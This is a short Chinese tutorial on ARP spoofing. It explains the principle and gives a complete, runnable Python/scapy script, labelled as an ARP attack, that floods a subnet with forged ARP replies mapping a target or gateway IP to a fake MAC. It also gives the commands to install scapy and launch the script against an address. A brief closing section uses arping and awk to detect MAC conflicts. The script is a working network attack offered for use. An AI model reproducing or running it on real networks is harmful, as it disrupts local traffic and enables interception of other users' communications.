原理
简单说ARP协议的基础就是信任局域网内所有的人,当A想要和B通讯是会发广播包询问:“谁是主机B”,正常b会应答。我们通过攻击脚本主动广播通知所有主机xx ip的地址MAC是xxx,使其他主机无法获取正确通讯地址。
arp攻击
可针对出口网关mac地址欺骗,或者针对指定地址欺骗
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Author: LJ
Email: admin@attacker.club
Last Modified: 2019-10-24 09:28:48
Description: ARP attack
'''
# sudo python arp_attack.py 172.16.2.1
import sys,os,re
from scapy.all import *
def check_ip(ipAddr):
compile_ip=re.compile('^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
if compile_ip.match(ipAddr):
return True
else:
return False
if __name__ == "__main__":
attackIP=sys.argv[1]
n=attackIP.split('.')[0:3]
broadcastIP="{0}.{1}.{2}.0/24".format(n[0],n[1],n[2])
if os.geteuid() != 0:
print ("This program must be run as root. Aborting.")
sys.exit()
if check_ip(attackIP):
srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=broadcastIP, psrc=attackIP, hwsrc="00:66:66:66:66:66"), timeout=2)
else:
print(attackIP, "is not a IP!")
print ("Please Use %s x.x.x.x" % (sys.argv[0]))
sys.exit()
执行
pip install -i http://mirrors.aliyun.com/pypi/simple --trusted-host mirrors.aliyun.com scapy # 安装py模块
sudo python arp_attack.py 172.16.2.1 # 指定攻击ip
关于Linux服务器ip冲突检测
arping检测arp响应工具
arping -c 1000 192.168.66.6 > record.txt # 记录1000次检测结果
awk '/\[/ {print $(NF-1)}' record.txt |uniq # 查看是否有冲突mac;匹配带'['的行,打印倒数第二列
Unicast reply from 192.168.66.6 [8A:77:A2:D3:B8:D2] 0.925ms